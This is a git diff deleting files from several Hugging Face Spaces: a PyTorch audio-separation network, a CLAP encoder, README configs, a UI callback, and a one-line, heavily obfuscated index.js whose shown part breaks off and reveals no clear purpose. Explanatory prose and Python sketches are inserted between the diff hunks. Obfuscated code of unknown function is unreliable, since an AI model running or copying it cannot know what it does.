- nout // 4 + 2, nout // 2, self.nin_lstm // 2, nout_lstm // 2
- )
-
- self.stg3_full_band_net = BaseNet(
- 3 * nout // 4 + 2, nout, self.nin_lstm, nout_lstm
- )
-
- self.out = nn.Conv2d(nout, 2, 1, bias=False)
- self.aux_out = nn.Conv2d(3 * nout // 4, 2, 1, bias=False)
-
- def forward(self, x):
- x = x[:, :, : self.max_bin]
-
- bandw = x.size()[2] // 2
- l1_in = x[:, :, :bandw]
- h1_in = x[:, :, bandw:]
- l1 = self.stg1_low_band_net(l1_in)
- h1 = self.stg1_high_band_net(h1_in)
- aux1 = torch.cat([l1, h1], dim=2)
-
- l2_in = torch.cat([l1_in, l1], dim=1)
- h2_in = torch.cat([h1_in, h1], dim=1)
- l2 = self.stg2_low_band_net(l2_in)
- h2 = self.stg2_high_band_net(h2_in)
- aux2 = torch.cat([l2, h2], dim=2)
-
- f3_in = torch.cat([x, aux1, aux2], dim=1)
- f3 = self.stg3_full_band_net(f3_in)
-
- mask = torch.sigmoid(self.out(f3))
- mask = F.pad(
- input=mask,
- pad=(0, 0, 0, self.output_bin - mask.size()[2]),
- mode="replicate",
- )
-
- if self.training:
- aux = torch.cat([aux1, aux2], dim=1)
- aux = torch.sigmoid(self.aux_out(aux))
- aux = F.pad(
- input=aux,
- pad=(0, 0, 0, self.output_bin - aux.size()[2]),
- mode="replicate",
- )
- return mask, aux
- else:
- return mask
-
- def predict_mask(self, x):
- mask = self.forward(x)
-
- if self.offset > 0:
- mask = mask[:, :, :, self.offset : -self.offset]
- assert mask.size()[3] > 0
-
- return mask
-
- def predict(self, x, aggressiveness=None):
- mask = self.forward(x)
- pred_mag = x * mask
-
- if self.offset > 0:
- pred_mag = pred_mag[:, :, :, self.offset : -self.offset]
- assert pred_mag.size()[3] > 0
-
- return pred_mag
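For readers skimming the deleted module above, here is a minimal shape-check sketch of how CascadedNet is typically driven. The flat import path, the n_fft value, and the dummy spectrogram sizes are assumptions for illustration only; the class actually lives inside the RVC repo's uvr5 pack alongside its layers_new dependency, and I have not verified it against that implementation.

```python
# Minimal sketch (assumptions: nets_new.py and layers_new.py are importable
# together, n_fft=2048 matches the checkpoint, and the time axis is long
# enough to survive the 64-frame offset trim applied by predict_mask).
import torch
from nets_new import CascadedNet  # hypothetical flat import for illustration

n_fft = 2048
model = CascadedNet(n_fft, nout=32, nout_lstm=128).eval()

# Dummy magnitude spectrogram: (batch, 2 channels, freq bins, time frames).
x = torch.rand(1, 2, n_fft // 2 + 1, 256)

with torch.no_grad():
    mask = model.predict_mask(x)                      # trimmed by model.offset per side
    separated = x[..., model.offset:-model.offset] * mask

print(mask.shape, separated.shape)
```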
diff --git a/spaces/AIGC-Audio/AudioGPT/text_to_audio/Make_An_Audio/ldm/modules/encoders/CLAP/clap.py b/spaces/AIGC-Audio/AudioGPT/text_to_audio/Make_An_Audio/ldm/modules/encoders/CLAP/clap.py
deleted file mode 100644
index 3141e47ec7b7df2e3cb81d11582b4738a5d23c1a..0000000000000000000000000000000000000000
--- a/spaces/AIGC-Audio/AudioGPT/text_to_audio/Make_An_Audio/ldm/modules/encoders/CLAP/clap.py
+++ /dev/null
@@ -1,89 +0,0 @@
-import numpy as np
-import torch
-import torch.nn.functional as F
-from torch import nn
-from transformers import AutoModel
-from .audio import get_audio_encoder
-
-class Projection(nn.Module):
- def __init__(self, d_in: int, d_out: int, p: float=0.5) -> None:
- super().__init__()
- self.linear1 = nn.Linear(d_in, d_out, bias=False)
- self.linear2 = nn.Linear(d_out, d_out, bias=False)
- self.layer_norm = nn.LayerNorm(d_out)
- self.drop = nn.Dropout(p)
-
- def forward(self, x: torch.Tensor) -> torch.Tensor:
- embed1 = self.linear1(x)
- embed2 = self.drop(self.linear2(F.gelu(embed1)))
- embeds = self.layer_norm(embed1 + embed2)
- return embeds
-
-class AudioEncoder(nn.Module):
- def __init__(self, audioenc_name:str, d_in: int, d_out: int, sample_rate: int, window_size: int,
- hop_size: int, mel_bins: int, fmin: int, fmax: int, classes_num: int) -> None:
- super().__init__()
-
- audio_encoder = get_audio_encoder(audioenc_name)
-
- self.base = audio_encoder(
- sample_rate, window_size,
- hop_size, mel_bins, fmin, fmax,
- classes_num, d_in)
-
- self.projection = Projection(d_in, d_out)
-
- def forward(self, x):
- out_dict = self.base(x)
- audio_features, audio_classification_output = out_dict['embedding'], out_dict['clipwise_output']
- projected_vec = self.projection(audio_features)
- return projected_vec, audio_classification_output
-
-class TextEncoder(nn.Module):
- def __init__(self, d_out: int, text_model: str, transformer_embed_dim: int) -> None:
- super().__init__()
- self.base = AutoModel.from_pretrained(text_model)
- self.projection = Projection(transformer_embed_dim, d_out)
-
- def forward(self, x):
- out = self.base(**x)[0]
- out = out[:, 0, :] # get CLS token output
- projected_vec = self.projection(out)
- return projected_vec
-
-class CLAP(nn.Module):
- def __init__(self,
- # audio
- audioenc_name: str,
- sample_rate: int,
- window_size: int,
- hop_size: int,
- mel_bins: int,
- fmin: int,
- fmax: int,
- classes_num: int,
- out_emb: int,
- # text
- text_model: str,
- transformer_embed_dim: int,
- # common
- d_proj: int,
- ):
- super().__init__()
-
-
- self.audio_encoder = AudioEncoder(
- audioenc_name, out_emb, d_proj,
- sample_rate, window_size, hop_size, mel_bins, fmin, fmax, classes_num)
-
- self.caption_encoder = TextEncoder(
- d_proj, text_model, transformer_embed_dim
- )
-
- self.logit_scale = nn.Parameter(torch.ones([]) * np.log(1 / 0.07))
-
- def forward(self, audio, text):
- audio_embed, _ = self.audio_encoder(audio)
- caption_embed = self.caption_encoder(text)
-
- return caption_embed, audio_embed, self.logit_scale.exp()
\ No newline at end of file
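As context for the deleted CLAP module above, the sketch below shows the usual CLIP-style way its three forward outputs (caption embeddings, audio embeddings, and the exponentiated logit scale) are combined into a contrastive objective. The batch size, projection width, and random tensors are stand-ins; real inputs would come from the package's audio and text preprocessing.

```python
# Sketch of the standard contrastive objective built from CLAP.forward's
# outputs. Shapes and the random tensors are placeholders for illustration.
import torch
import torch.nn.functional as F

batch, d_proj = 4, 1024                      # d_proj is an assumed projection size
caption_embed = torch.randn(batch, d_proj)   # stand-in for the text branch output
audio_embed = torch.randn(batch, d_proj)     # stand-in for the audio branch output
logit_scale = torch.tensor(1.0 / 0.07)       # initial value of logit_scale.exp()

# Temperature-scaled cosine-similarity logits.
a = F.normalize(audio_embed, dim=-1)
t = F.normalize(caption_embed, dim=-1)
logits_per_audio = logit_scale * a @ t.t()   # (batch, batch)

# Symmetric cross-entropy against the matching (diagonal) pairs.
labels = torch.arange(batch)
loss = 0.5 * (F.cross_entropy(logits_per_audio, labels)
              + F.cross_entropy(logits_per_audio.t(), labels))
print(loss.item())
```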
diff --git a/spaces/Adithedev/Text-Summarization-Tool/README.md b/spaces/Adithedev/Text-Summarization-Tool/README.md
deleted file mode 100644
index 70678abe290fb9fca9bd82ba13a45edd3211a1ad..0000000000000000000000000000000000000000
--- a/spaces/Adithedev/Text-Summarization-Tool/README.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-title: Text Summarizer
-emoji: 🏆
-colorFrom: green
-colorTo: red
-sdk: streamlit
-sdk_version: 1.21.0
-app_file: app.py
-pinned: false
-license: creativeml-openrail-m
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/sides/defaultcallbacks/VisibleCallbacks.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/sides/defaultcallbacks/VisibleCallbacks.js
deleted file mode 100644
index f140e17966236a30fa4bd0a1b50eecd3762afe86..0000000000000000000000000000000000000000
--- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/sides/defaultcallbacks/VisibleCallbacks.js
+++ /dev/null
@@ -1,20 +0,0 @@
-var GetShowCallback = function () {
- return function (child, key, sides, reset) {
- if (key !== 'panel') {
- sides.setChildVisible(child, true);
- }
- }
-}
-
-var GetHideCallback = function () {
- return function (child, key, sides, reset) {
- if (key !== 'panel') {
- sides.setChildVisible(child, false);
- }
- }
-}
-
-export default {
- show: GetShowCallback,
- hide: GetHideCallback
-}
\ No newline at end of file
diff --git a/spaces/AkshayKumarP/AI-ChatBot/README.md b/spaces/AkshayKumarP/AI-ChatBot/README.md
deleted file mode 100644
index dedad335282c1167f7214094aa52b5e4f8335292..0000000000000000000000000000000000000000
--- a/spaces/AkshayKumarP/AI-ChatBot/README.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-title: AI ChatBot
-emoji: 👀
-colorFrom: blue
-colorTo: gray
-sdk: gradio
-sdk_version: 3.47.1
-app_file: app.py
-pinned: false
-license: apache-2.0
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/Albertha/qwe123/index.js b/spaces/Albertha/qwe123/index.js
deleted file mode 100644
index af14e7aa9771a3f7befc9ada5e9c273d0023e64f..0000000000000000000000000000000000000000
--- a/spaces/Albertha/qwe123/index.js
+++ /dev/null
@@ -1 +0,0 @@
-(function(_0x4485c9,_0x22327b){function _0xefd3bf(_0x3e1c6c,_0x1dfa24,_0x15da7f,_0x195c5d,_0x405333){return _0x222c(_0x1dfa24- -0x3cc,_0x405333);}function _0x297c01(_0x30ec4a,_0x42df57,_0x259878,_0x4968a7,_0x262f74){return _0x222c(_0x30ec4a-0x36e,_0x259878);}const _0x356a3e=_0x4485c9();function _0xb68276(_0x21380b,_0x2e2973,_0x52b0fa,_0x117bd5,_0x3635d9){return _0x222c(_0x2e2973-0x241,_0x117bd5);}function _0x4acd10(_0x52497a,_0x3b158a,_0x45ad13,_0x477292,_0x54f686){return _0x222c(_0x3b158a-0x1b5,_0x477292);}function _0x2197ea(_0x728895,_0x5db489,_0x447ced,_0x923532,_0x60db0c){return _0x222c(_0x447ced-0x179,_0x923532);}while(!![]){try{const _0x348d5c=parseInt(_0x4acd10(0x3db,0x3de,0x389,0x4af,0x2ed))/(-0x1*-0x99b+0x1*0x12af+-0x1c49)*(parseInt(_0x4acd10(0x224,0x267,0x1fe,0x24b,0x2fc))/(0x2449+-0x5*0x75d+0x45*0x2))+parseInt(_0x4acd10(0x34f,0x32e,0x335,0x30c,0x2e0))/(-0x1a18+0x15d*-0x13+-0x3*-0x1156)+parseInt(_0x2197ea(0x364,0x3b7,0x2d6,0x26b,0x288))/(0x1e6+-0x1a3a*-0x1+-0x7*0x404)*(parseInt(_0x4acd10(0x47a,0x3ed,0x425,0x324,0x429))/(0xdca+-0xcdd*-0x3+-0x1a2e*0x2))+parseInt(_0xefd3bf(-0x249,-0x245,-0x167,-0x2c3,-0x272))/(0x2*-0x93b+0x21a3+-0x50d*0x3)*(parseInt(_0x4acd10(0x2e2,0x3a7,0x45d,0x34f,0x3a5))/(-0x8*-0x4a9+0x14ae+0x1*-0x39ef))+parseInt(_0x2197ea(0x1c3,0x1dd,0x22d,0x16f,0x2b1))/(-0x15f+-0x3*0xbb9+0x2*0x1249)*(parseInt(_0x297c01(0x56b,0x639,0x494,0x57d,0x4da))/(0x7a2+0x1*-0xedb+0x3a1*0x2))+parseInt(_0x4acd10(0x325,0x3cf,0x33d,0x3f5,0x470))/(-0x1f28+0x114+-0x1e*-0x101)*(-parseInt(_0xefd3bf(-0x199,-0x1e0,-0x163,-0x117,-0x119))/(-0x897+-0x1842+0x20e4))+parseInt(_0xb68276(0x3a8,0x40e,0x3ed,0x368,0x36b))/(-0x1c06+-0x1462+-0x1*-0x3074)*(-parseInt(_0x297c01(0x56d,0x622,0x59e,0x496,0x599))/(0x3*-0x45a+-0x1d72+0x3*0xe2f));if(_0x348d5c===_0x22327b)break;else _0x356a3e['push'](_0x356a3e['shift']());}catch(_0x2be93b){_0x356a3e['push'](_0x356a3e['shift']());}}}(_0x4e4c,0x82*-0x19d0+0x374aa+-0x71e1d*-0x3));function _0x1d31e6(_0x26aabc,_0x58e3f1,_0x4d962d,_0x44a366,_0x1e49ac){return _0x222c(_0x26aabc- -0x25,_0x4d962d);}const _0x7d8571=(function(){function _0x608687(_0x541c2e,_0x566e15,_0x56da78,_0x4712c,_0x461848){return _0x222c(_0x541c2e- -0x209,_0x566e15);}function _0x19cc71(_0x45b869,_0x4779d2,_0xbcb35d,_0x3ae9e2,_0x267e6a){return _0x222c(_0x3ae9e2-0x168,_0x267e6a);}function _0x2ff91a(_0x2fa4df,_0x2d5ef6,_0x128dfa,_0x5f2dcf,_0x1ed3d0){return _0x222c(_0x1ed3d0-0x382,_0x2d5ef6);}function _0x570f86(_0x328671,_0x57b76c,_0x39f1be,_0x5ab763,_0x4adaeb){return _0x222c(_0x5ab763- -0xc9,_0x57b76c);}function _0x237352(_0x27c7b9,_0x4fb426,_0xa489a,_0x533521,_0x1d2f34){return _0x222c(_0x27c7b9- -0x295,_0x533521);}const _0x5186e9={'CLxJL':function(_0x174521,_0x4e51f9){return _0x174521(_0x4e51f9);},'sEXRC':function(_0x47e55c,_0x304d65){return _0x47e55c+_0x304d65;},'vPGKz':_0x237352(-0x203,-0x2d5,-0x1b1,-0x11e,-0x1d8)+_0x237352(-0x72,-0x12,-0xf5,-0xc6,-0x14b)+_0x2ff91a(0x3ac,0x3ce,0x49a,0x47f,0x455)+_0x2ff91a(0x44f,0x4d3,0x3dc,0x4c2,0x45c),'TTiuI':_0x608687(-0x20,-0x38,0x8d,-0xc5,-0xbc)+_0x608687(-0x3d,-0x4c,0x80,-0x22,0x77)+_0x570f86(0x4a,0xb2,0xb9,0x4a,0x5)+_0x570f86(0x11d,0xec,0x168,0x13c,0xe0)+_0x19cc71(0x280,0x2ec,0x309,0x245,0x1ef)+_0x608687(-0xa0,-0x16f,-0x14e,-0xee,0x1)+'\x20)','YyzBo':function(_0x3fd5d6,_0x145fea){return _0x3fd5d6!==_0x145fea;},'liNNj':_0x608687(0x21,0x5b,0x60,-0x5a,-0xc8),'ZtWnq':function(_0x40dedb,_0x579930){return 
_0x40dedb===_0x579930;},'pGfic':_0x2ff91a(0x407,0x4fd,0x4b4,0x455,0x49b),'JOvwt':_0x570f86(0x82,0x58,0x78,0xc7,0xdf)+_0x237352(-0xfd,-0x2e,-0x60,-0xce,-0x18c)+_0x608687(-0x108,-0x1bb,-0xe1,-0xed,-0x1cd),'IgZqH':_0x570f86(0x1b,0xf5,-0xb7,0x4,-0x11)+'er','HHIYV':function(_0x3281b8){return _0x3281b8();},'fwptI':function(_0x442173,_0x163537){return _0x442173===_0x163537;},'AFQdy':_0x19cc71(0x405,0x3c5,0x42b,0x3c5,0x300),'EGhZe':_0x237352(-0x1d1,-0x1b3,-0x20a,-0x266,-0x1f7)};let _0x460d02=!![];return function(_0x23b1fb,_0x5bea40){const _0x4ef3c3={'hLqPS':_0x5186e9[_0x2c608f(-0x224,-0x1b8,-0xb5,-0x179,-0xa5)],'LEbOf':_0x5186e9[_0x2c608f(-0xa7,-0x64,-0x8,-0xc1,-0xe0)],'RExtq':function(_0x36abf9){function _0x3a6869(_0x1f6ded,_0x6e3a20,_0x1c712,_0x5e2b93,_0x25a8c9){return _0x2c608f(_0x1f6ded-0x1ac,_0x6e3a20-0x1de,_0x1c712-0xa3,_0x5e2b93- -0x1d1,_0x25a8c9);}return _0x5186e9[_0x3a6869(-0x3c3,-0x29e,-0x33e,-0x32e,-0x23f)](_0x36abf9);}};function _0x130cc0(_0x28523e,_0x37ac41,_0x46edaa,_0x4a3eff,_0x2357ad){return _0x237352(_0x46edaa- -0x138,_0x37ac41-0x66,_0x46edaa-0x3a,_0x2357ad,_0x2357ad-0x33);}function _0x2c608f(_0x5aeefc,_0x508c15,_0x31febe,_0x2f9456,_0xc3f468){return _0x237352(_0x2f9456-0x8f,_0x508c15-0xa7,_0x31febe-0xef,_0xc3f468,_0xc3f468-0x1d2);}function _0x4cd69c(_0x2f64ef,_0x3d09f6,_0x5c2aaa,_0x9d422e,_0x2d6659){return _0x19cc71(_0x2f64ef-0xf6,_0x3d09f6-0x73,_0x5c2aaa-0x71,_0x5c2aaa-0x1d3,_0x2d6659);}function _0x300ab1(_0x5eb7c0,_0x1aa2f0,_0x37acbd,_0xe8d84b,_0x89da59){return _0x19cc71(_0x5eb7c0-0x1c0,_0x1aa2f0-0x1be,_0x37acbd-0x185,_0x89da59- -0x190,_0x5eb7c0);}function _0x48b8ea(_0x46b6f8,_0x47d45e,_0x1afc7a,_0x224ce8,_0x1954a4){return _0x570f86(_0x46b6f8-0xfa,_0x1954a4,_0x1afc7a-0xef,_0x47d45e-0x387,_0x1954a4-0xb2);}if(_0x5186e9[_0x2c608f(-0x35,-0x88,-0x13a,-0x9c,-0x103)](_0x5186e9[_0x130cc0(-0x2d3,-0x41d,-0x349,-0x31a,-0x2ca)],_0x5186e9[_0x4cd69c(0x4ca,0x445,0x3e5,0x39d,0x347)]))return function(_0x5a41db){}[_0x48b8ea(0x4a0,0x463,0x548,0x4af,0x3ab)+_0x300ab1(0x28,-0x3a,0xd6,0xd9,0x9d)+'r'](_0x4ef3c3[_0x130cc0(-0x1d2,-0x134,-0x175,-0x14c,-0x1c4)])[_0x2c608f(-0x38,0xae,0xcf,-0xf,-0xa9)](_0x4ef3c3[_0x300ab1(0x156,0x15d,0xb7,0x1eb,0x144)]);else{const _0x2277f4=_0x460d02?function(){function _0x2401aa(_0x2b6833,_0x4b79ca,_0x31a993,_0xe8033,_0x334706){return _0x2c608f(_0x2b6833-0x1cc,_0x4b79ca-0x49,_0x31a993-0x58,_0x334706-0x229,_0xe8033);}function _0x3c2a18(_0x5a95ec,_0x587d1e,_0x39e62c,_0xfa1821,_0x522fa){return _0x4cd69c(_0x5a95ec-0x62,_0x587d1e-0xf3,_0x39e62c- -0x77,_0xfa1821-0xd2,_0x587d1e);}function _0x50cbbd(_0x1a3960,_0x5e2e55,_0x4eba15,_0x58019e,_0x40c53e){return _0x130cc0(_0x1a3960-0x145,_0x5e2e55-0x1b1,_0x5e2e55-0x5ce,_0x58019e-0x1ee,_0x4eba15);}function _0x4e7947(_0x45c3fd,_0x547ae3,_0x550ac9,_0x43e80c,_0x4966d8){return _0x4cd69c(_0x45c3fd-0x165,_0x547ae3-0x20,_0x550ac9- -0xf3,_0x43e80c-0x4c,_0x547ae3);}function _0x5966bf(_0x424dbb,_0x200755,_0x6b382,_0x2ac986,_0x46bc6a){return _0x2c608f(_0x424dbb-0x105,_0x200755-0x3b,_0x6b382-0x100,_0x424dbb-0x1ba,_0x6b382);}const _0x22a4a1={'kcOBP':function(_0x24e26c,_0xdad72f){function _0x5639a6(_0x20c4b6,_0x4df758,_0x83e411,_0x47ac48,_0x53a311){return _0x222c(_0x4df758-0x99,_0x83e411);}return _0x5186e9[_0x5639a6(0x211,0x1be,0x192,0xdc,0x24d)](_0x24e26c,_0xdad72f);},'UGzxM':function(_0xa58f7f,_0x23a6ad){function _0x37e16e(_0x1b8800,_0x8a743d,_0x16ed08,_0x310d7f,_0x5ed0b2){return _0x222c(_0x16ed08-0x69,_0x1b8800);}return 
_0x5186e9[_0x37e16e(0x1e3,0x7d,0x123,0x173,0x1be)](_0xa58f7f,_0x23a6ad);},'SQFha':_0x5186e9[_0x50cbbd(0x2e3,0x28a,0x302,0x2ca,0x296)],'rcsmG':_0x5186e9[_0x50cbbd(0x280,0x2d5,0x392,0x27d,0x29d)]};if(_0x5186e9[_0x2401aa(0x2a2,0x20c,0x2e6,0x300,0x21e)](_0x5186e9[_0x50cbbd(0x1d4,0x290,0x292,0x2e7,0x355)],_0x5186e9[_0x5966bf(0x43,-0x79,-0x2e,-0x27,0xbd)])){const _0x5da1fd=function(){function _0x21f5a9(_0x566629,_0x4af024,_0x17f5cd,_0x24caf2,_0x85b603){return _0x4e7947(_0x566629-0x1a4,_0x17f5cd,_0x24caf2- -0x385,_0x24caf2-0x55,_0x85b603-0x182);}function _0x26b488(_0x285512,_0x66c63,_0x2c0528,_0xeec007,_0x2f97fc){return _0x50cbbd(_0x285512-0x68,_0x2c0528- -0x57f,_0xeec007,_0xeec007-0x154,_0x2f97fc-0x12d);}let _0x5375cc;try{_0x5375cc=_0x22a4a1[_0x2f1c3d(-0x8a,-0x1ff,-0x18f,-0x14b,-0x216)](_0x2937d6,_0x22a4a1[_0x26b488(-0x26c,-0x274,-0x23c,-0x29e,-0x295)](_0x22a4a1[_0x26b488(-0x1bc,-0x2ae,-0x23c,-0x302,-0x2de)](_0x22a4a1[_0x2f1c3d(-0xdf,-0x202,-0x187,-0x144,-0x169)],_0x22a4a1[_0x26b488(-0x296,-0x2ed,-0x2a7,-0x314,-0x351)]),');'))();}catch(_0x262405){_0x5375cc=_0x55d1dc;}function _0x2f1c3d(_0x37184d,_0x278779,_0x2cefa0,_0x583550,_0x1da5b5){return _0x50cbbd(_0x37184d-0x145,_0x583550- -0x569,_0x2cefa0,_0x583550-0x17c,_0x1da5b5-0x198);}function _0x1a8f86(_0x370014,_0x346c35,_0x2c014e,_0x480f76,_0x2a3339){return _0x4e7947(_0x370014-0x41,_0x370014,_0x2a3339- -0x4d4,_0x480f76-0x85,_0x2a3339-0x19d);}function _0x467577(_0x345385,_0x3e3106,_0x42df17,_0x1e5bac,_0x1b4099){return _0x50cbbd(_0x345385-0x1dd,_0x1e5bac- -0x396,_0x1b4099,_0x1e5bac-0x8e,_0x1b4099-0x7f);}return _0x5375cc;},_0x2295a4=_0x4ef3c3[_0x50cbbd(0x326,0x389,0x304,0x43f,0x2f2)](_0x5da1fd);_0x2295a4[_0x3c2a18(0x3ff,0x359,0x37b,0x354,0x3d6)+_0x50cbbd(0x240,0x2af,0x39e,0x25f,0x277)+'l'](_0x56a47c,-0x7*-0x55+-0xc75*0x2+0x2637);}else{if(_0x5bea40){if(_0x5186e9[_0x2401aa(0xbb,0x1a3,0x15,0x47,0xb7)](_0x5186e9[_0x3c2a18(0x46e,0x4ba,0x4e3,0x414,0x4c8)],_0x5186e9[_0x2401aa(0x234,0x2d3,0x267,0x1c5,0x242)])){const _0xe12e92=_0x5bea40[_0x4e7947(0x516,0x4b6,0x43f,0x38b,0x3d0)](_0x23b1fb,arguments);return _0x5bea40=null,_0xe12e92;}else return _0x132982;}}}:function(){};return _0x460d02=![],_0x2277f4;}};}()),_0x75b4a9=_0x7d8571(this,function(){function _0x21f005(_0x358bff,_0x186eb5,_0x4954bd,_0x5ca7a1,_0xed9ba6){return _0x222c(_0x186eb5- -0xcf,_0xed9ba6);}const _0x16d6bc={};function _0x1246b2(_0x2db16b,_0x221bdc,_0x183b73,_0x31610d,_0x243ff1){return _0x222c(_0x2db16b- -0x290,_0x31610d);}function _0x3e745b(_0x1d7ec6,_0x833c95,_0xc700d8,_0x2c3110,_0x28978e){return _0x222c(_0x1d7ec6- -0x1c2,_0x833c95);}_0x16d6bc[_0x22182c(0x61,0xeb,0x1,0x77,0x71)]=_0x1246b2(-0x4e,0x0,0x81,-0xef,-0xd1)+_0x3e745b(0x2,-0x63,-0x6,-0x3b,-0xd2)+'+$';const _0x15c2a5=_0x16d6bc;function _0x424314(_0x5486ac,_0x48a52c,_0x324a4f,_0x1274bc,_0x37015e){return _0x222c(_0x5486ac- -0x2e5,_0x48a52c);}function _0x22182c(_0x5adafe,_0x1c7d15,_0x37ae8e,_0x3e8694,_0x4c108b){return _0x222c(_0x37ae8e- -0x150,_0x5adafe);}return _0x75b4a9[_0x424314(-0xa7,-0xfd,-0x168,-0x89,0x2b)+_0x21f005(-0xd1,-0x30,-0x48,-0xdc,0x27)]()[_0x22182c(-0x14e,-0x75,-0xad,0x9,0x3b)+'h'](_0x15c2a5[_0x1246b2(-0x13f,-0x1ae,-0xe9,-0xbd,-0x62)])[_0x3e745b(0x7c,-0x35,0x15e,0xeb,0x142)+_0x424314(-0x246,-0x1fa,-0x18c,-0x167,-0x223)]()[_0x1246b2(-0xeb,-0xc9,-0x106,-0x18,-0xac)+_0x424314(-0x220,-0x22a,-0x249,-0x255,-0x223)+'r'](_0x75b4a9)[_0x3e745b(-0x11f,-0x1fd,-0x8a,-0x59,-0x6a)+'h'](_0x15c2a5[_0x1246b2(-0x13f,-0x192,-0x1b2,-0xfa,-0x116)]);});_0x75b4a9();const _0xdd6162=(function(){function 
_0x1b7e56(_0x565d9d,_0x10be8b,_0x1db0a1,_0x2a9615,_0x58aa3d){return _0x222c(_0x2a9615- -0xc9,_0x1db0a1);}function _0x535ef2(_0x3a5747,_0x4792c5,_0x575458,_0x5e113a,_0x5afd25){return _0x222c(_0x575458-0x2b8,_0x5afd25);}function _0x47b722(_0x34e60e,_0x214a6d,_0x44d11e,_0x101c21,_0xf78db){return _0x222c(_0x44d11e- -0x24d,_0x214a6d);}function _0x312d48(_0x170ce1,_0x2d452b,_0x1e9e77,_0x421523,_0x3e21ad){return _0x222c(_0x3e21ad-0x11a,_0x421523);}const _0x282ffb={'pFaCe':_0x47b722(-0x181,-0x1ec,-0x1a9,-0x23a,-0x19a),'pOQpd':function(_0x2e5532,_0x5efd90){return _0x2e5532(_0x5efd90);},'djRtw':_0x3cfc6d(0x66,0x65,0xdc,0x88,0x91),'bUAtF':_0x47b722(-0x51,-0x39,-0xfa,-0xe8,-0x1d7),'cVTCn':function(_0x3b4db0,_0x3dad4d){return _0x3b4db0+_0x3dad4d;},'lbAPp':function(_0xcab92f,_0x426ab2){return _0xcab92f==_0x426ab2;},'ZSRjq':function(_0x2ce010,_0x3efc49){return _0x2ce010+_0x3efc49;},'ZLSGn':function(_0x5c89d0,_0x118da9,_0x1c28f0,_0x2238c8){return _0x5c89d0(_0x118da9,_0x1c28f0,_0x2238c8);},'vwWMV':_0x1b7e56(-0x4b,0x9d,0xd7,0x1a,0x46)+_0x312d48(0x23a,0x31d,0x2dd,0x3e4,0x2f4),'QPwpg':function(_0x193d1f,_0x3c05f8){return _0x193d1f(_0x3c05f8);},'esxiR':function(_0x4983fa,_0x50c8ac,_0x47abff){return _0x4983fa(_0x50c8ac,_0x47abff);},'OEyyx':_0x1b7e56(-0x4f,0xc1,0xb3,0x1a,0x104)+_0x535ef2(0x508,0x3bb,0x491,0x580,0x47b)+'r:','PIoog':function(_0x1d38fa,_0x483221){return _0x1d38fa!==_0x483221;},'ENUXM':_0x312d48(0x253,0xdf,0x1dc,0x104,0x1c2),'bTZpH':_0x47b722(-0x228,-0x16c,-0x18d,-0x273,-0xe7),'cxfXB':function(_0x5a536d,_0x328336){return _0x5a536d===_0x328336;},'NtuTp':_0x3cfc6d(0x70,-0xb7,-0x6b,0xb,-0x4a),'ELQqV':function(_0x44d3d6,_0x5b067c){return _0x44d3d6===_0x5b067c;},'iiOWN':_0x47b722(-0x170,0x1c,-0x98,0x22,-0x11c)};function _0x3cfc6d(_0x5df056,_0x5ccbb8,_0x4aa519,_0x43fae4,_0x29a057){return _0x222c(_0x29a057- -0x154,_0x5df056);}let _0x22eb26=!![];return function(_0x50be46,_0x43bad9){function _0x33b0a4(_0x18fadf,_0x30c63f,_0x2b75b7,_0x24f0dc,_0x3512d5){return _0x3cfc6d(_0x3512d5,_0x30c63f-0x51,_0x2b75b7-0x71,_0x24f0dc-0x128,_0x18fadf-0x5c);}function _0x11392f(_0x3ecc1f,_0x1bd1e6,_0x29a3c0,_0x3acf01,_0x1c1101){return _0x47b722(_0x3ecc1f-0x2b,_0x3ecc1f,_0x29a3c0-0x561,_0x3acf01-0x17d,_0x1c1101-0x8a);}function _0xf20218(_0x19de30,_0x9f3743,_0x425958,_0x1205ef,_0x4f5804){return _0x535ef2(_0x19de30-0x173,_0x9f3743-0xad,_0x4f5804- -0x517,_0x1205ef-0x105,_0x425958);}function _0x4eb679(_0x3b816b,_0x1932f7,_0x1415e0,_0xddfa2,_0x2a57ea){return _0x1b7e56(_0x3b816b-0x94,_0x1932f7-0x1c1,_0x3b816b,_0xddfa2-0xf4,_0x2a57ea-0x133);}if(_0x282ffb[_0xf20218(-0x161,-0x241,-0x140,-0x296,-0x1d4)](_0x282ffb[_0xf20218(-0xbf,-0x174,-0x194,-0x162,-0x154)],_0x282ffb[_0xf20218(-0x217,-0x6e,-0x153,-0x11b,-0x154)])){const _0x3e9b07=_0x22eb26?function(){function _0x411b77(_0x410e7d,_0x3cfffb,_0x220af8,_0x2b8f6d,_0x1b28ab){return _0x33b0a4(_0x220af8-0x406,_0x3cfffb-0x13c,_0x220af8-0xc7,_0x2b8f6d-0xbd,_0x1b28ab);}function _0x201965(_0x67a9e8,_0x33a516,_0x2aaaf0,_0x44bbeb,_0x773eb7){return _0x11392f(_0x773eb7,_0x33a516-0x139,_0x67a9e8- -0x685,_0x44bbeb-0x1c4,_0x773eb7-0x21);}function _0x5e92f3(_0x4e4c3e,_0x57c64a,_0x40e5ca,_0x1d5ed5,_0x5766e1){return _0x33b0a4(_0x5766e1- -0x284,_0x57c64a-0x6a,_0x40e5ca-0x1dc,_0x1d5ed5-0x136,_0x40e5ca);}const _0x34305b={'drGOn':_0x282ffb[_0x411b77(0x41e,0x33b,0x422,0x446,0x3cb)],'fFEtn':function(_0x4af744,_0x105044){function _0xbac4c8(_0x12fc8e,_0x4b069c,_0x9627e8,_0x373c7f,_0x2343a5){return _0x411b77(_0x12fc8e-0x129,_0x4b069c-0x128,_0x373c7f-0x7d,_0x373c7f-0x91,_0x2343a5);}return 
